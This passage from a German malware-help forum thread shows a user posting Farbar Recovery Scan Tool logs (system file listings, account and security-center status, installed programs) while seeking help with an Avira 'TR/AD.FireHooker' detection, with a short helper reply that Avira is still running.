2020-09-15 17:41 - 2020-09-15 17:41 - 000939448 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000934912 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Service.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000929792 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000914216 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppContracts.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000856576 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000844448 _____ (Microsoft Corporation) C:\WINDOWS\system32\pkeyhelper.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000822784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\PEAuth.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000809280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000803328 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000777728 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShellCommonCommonProxyStub.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000752640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Launcher.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000733696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\nwifi.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000702776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storport.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000670208 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000657920 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000637440 _____ (Microsoft Corporation) C:\WINDOWS\system32\UiaManager.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000609792 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpsvc.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000602440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBXHCI.SYS
2020-09-15 17:41 - 2020-09-15 17:41 - 000585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2020-09-15 17:41 - 2020-09-15 17:41 - 000552960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MicrosoftAccountWAMExtension.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000527880 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000481792 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdpusersvc.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000475136 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000472376 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pci.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000437760 _____ (Microsoft Corporation) C:\WINDOWS\system32\MicrosoftAccountExtension.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000430592 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000429880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\volsnap.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000428672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000421888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanui.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000420456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000418800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelpep.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000393728 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlangpui.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000382464 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000361472 _____ C:\WINDOWS\system32\Windows.Internal.UI.Shell.WindowTabManager.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000339456 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_InputPersonalization.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000310272 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlancfg.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000305472 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\provops.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000289280 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcTok.exe
2020-09-15 17:41 - 2020-09-15 17:41 - 000278016 _____ (Microsoft Corporation) C:\WINDOWS\system32\provhandlers.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3svc.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000259584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\winnat.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000255296 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000239432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxApplicabilityEngine.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\tetheringservice.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000237568 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000237056 _____ (Microsoft Corporation) C:\WINDOWS\system32\provisioningcsp.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000223040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ataport.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000195896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000185672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storahci.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000185664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\usbccgp.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000160064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\vmbus.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000159048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000155952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\stornvme.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000152376 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadWamExtension.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000150528 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpatialAudioLicenseSrv.exe
2020-09-15 17:41 - 2020-09-15 17:41 - 000131584 _____ (Microsoft Corporation) C:\WINDOWS\system32\UtcDecoderHost.exe
2020-09-15 17:41 - 2020-09-15 17:41 - 000125952 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000121856 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlgpclnt.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\provtool.exe
2020-09-15 17:41 - 2020-09-15 17:41 - 000113664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthenum.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000112128 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000110592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BTHUSB.SYS
2020-09-15 17:41 - 2020-09-15 17:41 - 000107008 _____ (Microsoft Corporation) C:\WINDOWS\system32\NFCProvisioningPlugin.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000106496 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000106496 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3msm.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000098816 _____ (Microsoft Corporation) C:\WINDOWS\system32\provdatastore.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000094208 _____ (Microsoft Corporation) C:\WINDOWS\system32\dot3api.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000093184 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000092160 _____ (Microsoft Corporation) C:\WINDOWS\system32\BarcodeProvisioningPlugin.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000090400 _____ (Microsoft Corporation) C:\WINDOWS\system32\remoteaudioendpoint.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000080896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\monitor.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\system32\autopilot.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000078528 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsManagementServiceWinRt.ProxyStub.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\tetheringclient.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000071168 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.EnrollmentStatusTracking.ConfigProvider.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000070976 _____ (Microsoft Corporation) C:\WINDOWS\system32\GameInput.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\RemovableMediaProvisioningPlugin.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000067072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.PlatformExtension.DevicePickerExperience.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000060744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\storufs.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000059904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AssignedAccessRuntime.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000056648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pciidex.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000055808 _____ (Microsoft Corporation) C:\WINDOWS\system32\audioresourceregistrar.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\tetheringconfigsp.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiredNetworkCSP.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BthMini.SYS
2020-09-15 17:41 - 2020-09-15 17:41 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2020-09-15 17:41 - 2020-09-15 17:41 - 000041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000041472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000037888 _____ (Microsoft Corporation) C:\WINDOWS\system32\IcsEntitlementHost.exe
2020-09-15 17:41 - 2020-09-15 17:41 - 000036352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000034304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Management.Provisioning.ProxyStub.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\KNetPwrDepBroker.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000031744 _____ (Microsoft Corporation) C:\WINDOWS\system32\FaxPrinterInstaller.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\msacm32.drv
2020-09-15 17:41 - 2020-09-15 17:41 - 000030024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\atapi.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000029456 _____ (Microsoft Corporation) C:\WINDOWS\system32\vmbuspipe.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000026624 _____ (Microsoft Corporation) C:\WINDOWS\system32\midimap.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000022016 _____ (Microsoft Corporation) C:\WINDOWS\system32\provdiagnostics.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000019776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\intelide.sys
2020-09-15 17:41 - 2020-09-15 17:41 - 000016896 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanhlp.dll
2020-09-15 17:41 - 2020-09-15 17:41 - 000016704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pciide.sys
2020-09-15 17:07 - 2020-08-25 05:42 - 000391168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
2020-09-15 17:07 - 2020-08-25 05:36 - 000495616 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
         

Geändert von Öhm (04.10.2020 um 12:04 Uhr)

Alt 04.10.2020, 12:07   #5
Öhm
 
Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker - Standard

Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker



Hier ist der zweite Teil der FRST:

Code:
ATTFilter
==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2020-10-04 11:38 - 2018-10-06 14:21 - 000000000 ____D C:\ProgramData\Avira
2020-10-04 11:38 - 2018-10-06 14:21 - 000000000 ____D C:\Program Files (x86)\Avira
2020-10-04 11:37 - 2018-10-06 14:15 - 000000000 ____D C:\Users\Tamy\AppData\LocalLow\Mozilla
2020-10-04 11:36 - 2020-08-18 08:57 - 000003688 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-10-04 11:36 - 2020-08-18 08:57 - 000003464 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-10-04 11:36 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2020-10-04 11:36 - 2018-04-12 01:38 - 000000000 ___HD C:\WINDOWS\system32\GroupPolicy
2020-10-04 11:35 - 2018-10-06 14:20 - 000000000 ____D C:\Program Files (x86)\Steam
2020-10-04 11:34 - 2019-12-07 11:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-10-04 11:33 - 2020-08-18 08:31 - 000437416 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2020-10-04 11:33 - 2019-01-03 10:16 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2020-10-04 11:33 - 2018-10-06 14:51 - 000000000 ____D C:\ProgramData\NVIDIA
2020-10-04 11:32 - 2020-08-18 08:57 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-10-04 11:32 - 2020-08-18 08:31 - 000008192 ___SH C:\DumpStack.log.tmp
2020-10-04 11:32 - 2019-12-07 11:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2020-10-04 11:32 - 2018-10-06 14:15 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-10-04 11:30 - 2019-12-07 11:13 - 000000000 ____D C:\WINDOWS\INF
2020-10-04 11:29 - 2019-12-07 11:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2020-10-04 11:29 - 2018-10-06 14:16 - 000744808 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2020-10-04 11:28 - 2020-08-18 08:31 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-10-04 11:28 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\Macromed
2020-10-04 11:09 - 2019-12-07 11:14 - 000000000 ___HD C:\Program Files\WindowsApps
2020-10-04 11:09 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-10-04 11:01 - 2020-01-20 20:51 - 000000000 ____D C:\Program Files (x86)\Adobe
2020-10-04 11:01 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2020-10-03 21:42 - 2019-12-07 11:14 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2020-10-03 21:31 - 2020-07-07 08:30 - 000002419 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-10-03 21:29 - 2018-10-06 14:15 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-10-03 09:56 - 2018-10-20 12:23 - 000000000 ____D C:\Users\Tamy\AppData\Roaming\vlc
2020-10-03 09:56 - 2018-10-20 08:50 - 000000000 ____D C:\Program Files (x86)\VideoLAN
2020-10-03 09:54 - 2018-06-08 10:23 - 000000000 ____D C:\Users\Tamy\AppData\Local\Packages
2020-10-02 11:36 - 2019-11-22 23:09 - 000000000 ____D C:\Users\Tamy\AppData\Roaming\obs-studio
2020-10-02 10:24 - 2018-10-28 12:30 - 000001278 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
2020-09-28 21:43 - 2019-09-21 14:35 - 000000000 ____D C:\Users\Tamy\AppData\Roaming\.minecraft
2020-09-27 15:54 - 2018-10-27 18:40 - 000000000 ____D C:\ProgramData\tmp
2020-09-27 15:54 - 2018-10-27 18:40 - 000000000 ____D C:\ProgramData\hps
2020-09-27 14:26 - 2018-10-28 09:12 - 000000000 ____D C:\Users\Tamy\Downloads\Fotos
2020-09-26 09:41 - 2019-11-22 22:15 - 000000000 ____D C:\Users\Tamy\AppData\Roaming\Twitch
2020-09-26 09:26 - 2020-04-02 12:33 - 000000000 ____D C:\Users\Tamy\Downloads\Sonstiges
2020-09-26 08:30 - 2019-02-05 20:27 - 000000000 ____D C:\ProgramData\Mozilla
2020-09-24 10:46 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\LiveKernelReports
2020-09-23 20:46 - 2018-10-27 14:48 - 000000000 ____D C:\Users\Tamy\Downloads\Bilder
2020-09-23 19:08 - 2020-04-07 13:44 - 000000000 ____D C:\Users\Tamy\Downloads\Sortieren
2020-09-23 15:51 - 2020-04-07 10:13 - 000000000 ____D C:\Program Files (x86)\PDF24
2020-09-23 15:35 - 2018-10-06 14:21 - 000000000 ____D C:\ProgramData\Package Cache
2020-09-20 11:39 - 2019-08-06 20:10 - 000000000 ____D C:\Users\Tamy\Downloads\Twitch
2020-09-20 10:53 - 2019-11-04 20:13 - 000000000 ____D C:\Users\Public\Security Sessions
2020-09-19 13:26 - 2020-08-18 08:40 - 001722788 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-09-19 13:26 - 2019-12-07 16:51 - 000743672 _____ C:\WINDOWS\system32\perfh007.dat
2020-09-19 13:26 - 2019-12-07 16:51 - 000150094 _____ C:\WINDOWS\system32\perfc007.dat
2020-09-19 10:11 - 2018-12-18 22:09 - 000000000 ____D C:\Program Files (x86)\Microsoft Office
2020-09-17 08:48 - 2018-10-06 15:00 - 000000000 ____D C:\WINDOWS\system32\MRT
2020-09-17 08:43 - 2018-10-06 15:00 - 129170736 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2020-09-15 20:06 - 2019-12-07 16:54 - 000000000 ___SD C:\WINDOWS\system32\AppV
2020-09-15 20:06 - 2019-12-07 16:54 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ___SD C:\WINDOWS\system32\DiagSvcs
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ___RD C:\WINDOWS\PrintDialog
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SysWOW64\Dism
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SystemResources
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\oobe
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\migwiz
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\Dism
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\appraiser
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\Provisioning
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\PolicyDefinitions
2020-09-15 20:06 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2020-09-15 17:49 - 2019-12-07 11:03 - 000000000 ____D C:\WINDOWS\servicing
2020-09-15 17:49 - 2019-12-07 11:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2020-09-15 17:41 - 2020-08-18 08:35 - 002876416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2020-09-11 08:06 - 2020-08-18 08:57 - 000003374 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-950702919-2450676760-769127011-1001
2020-09-11 08:06 - 2020-08-17 23:42 - 000002376 _____ C:\Users\Tamy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-09-11 08:06 - 2018-06-08 10:25 - 000000000 ___RD C:\Users\Tamy\OneDrive
2020-09-09 10:05 - 2019-12-07 11:18 - 000842296 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2020-09-09 10:05 - 2019-12-07 11:18 - 000175160 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================
         


Alt 04.10.2020, 13:54   #6
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker - Standard

Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker



Da läuft immer noch Avira.
__________________
--> Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker

Alt 04.10.2020, 15:44   #7
Öhm
 
Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker - Standard

Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker



Jetzt sollte Avira komplett weg sein ...

Hier die Addition:

Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 04-10-2020
durchgeführt von Tamy (04-10-2020 15:34:58)
Gestartet von C:\Users\Tamy\Desktop
Windows 10 Pro Version 2004 19041.508 (X64) (2020-08-18 06:57:41)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Admin (S-1-5-21-950702919-2450676760-769127011-1002 - Limited - Enabled)
Administrator (S-1-5-21-950702919-2450676760-769127011-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-950702919-2450676760-769127011-503 - Limited - Disabled)
Gast (S-1-5-21-950702919-2450676760-769127011-501 - Limited - Disabled)
Tamy (S-1-5-21-950702919-2450676760-769127011-1001 - Administrator - Enabled) => C:\Users\Tamy
WDAGUtilityAccount (S-1-5-21-950702919-2450676760-769127011-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Up to date) {33CF8AA2-FA06-4AD4-98AB-332D53DD7FFB}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Amazon Kindle (HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\Amazon Kindle) (Version: 1.17.1.44183 - Amazon)
Avira (HKLM-x32\...\{47430B15-7CE6-46CF-903E-B85CD2D29A7D}) (Version: 1.2.151.3852 - Avira Operations GmbH & Co. KG) Hidden
Avira (HKLM-x32\...\{f24507a8-a438-4e46-9563-6d53c727bd7e}) (Version: 1.2.151.3852 - Avira Operations GmbH & Co. KG) Hidden
Blackmagic RAW Common Components (HKLM\...\{B5ABFF44-9702-4CA1-A7D8-DBA659709C49}) (Version: 1.7 - Blackmagic Design)
calibre 64bit (HKLM\...\{0185ADA8-A025-46A7-8A5C-7F5C2C000CC5}) (Version: 4.21.0 - Kovid Goyal)
DaVinci Resolve (HKLM\...\{74302397-BD1E-4917-B728-A1233CDEB39A}) (Version: 16.2.0055 - Blackmagic Design)
DaVinci Resolve Keyboards (HKLM\...\{04F776FB-37A2-4116-84F2-6CF3D731999D}) (Version: 1.0.0.0 - Blackmagic Design)
DaVinci Resolve Panels (HKLM\...\{567706B7-1501-43BC-81AB-C7E306B40C73}) (Version: 1.3.2.0 - Blackmagic Design)
Die Sims™ 4 (HKLM-x32\...\{48EBEBBF-B9F8-4520-A3CF-89A730721917}) (Version: 1.63.136.1010 - Electronic Arts Inc.)
doPDF 7.3 printer (HKLM\...\doPDF 7 printer_is1) (Version:  - Softland)
GUILD WARS (HKLM-x32\...\Guild Wars) (Version:  - )
Guild Wars 2 (HKLM\...\Guild Wars 2) (Version:  - NCsoft Corporation, Ltd.)
IrfanView 4.53 (64-bit) (HKLM\...\IrfanView64) (Version: 4.53 - Irfan Skiljan)
Logitech Gaming Software 9.00 (HKLM\...\Logitech Gaming Software) (Version: 9.00.42 - Logitech Inc.)
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 85.0.564.68 - Microsoft Corporation)
Microsoft Edge Update (HKLM-x32\...\Microsoft Edge Update) (Version: 1.3.135.29 - )
Microsoft Office 365 ProPlus - de-de (HKLM\...\O365ProPlusRetail - de-de) (Version: 16.0.12527.21104 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-950702919-2450676760-769127011-1001\...\OneDriveSetup.exe) (Version: 20.143.0716.0003 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.24.28127 (HKLM-x32\...\{282975d8-55fe-4991-bbbb-06a72581ce58}) (Version: 14.24.28127.4 - Microsoft Corporation)
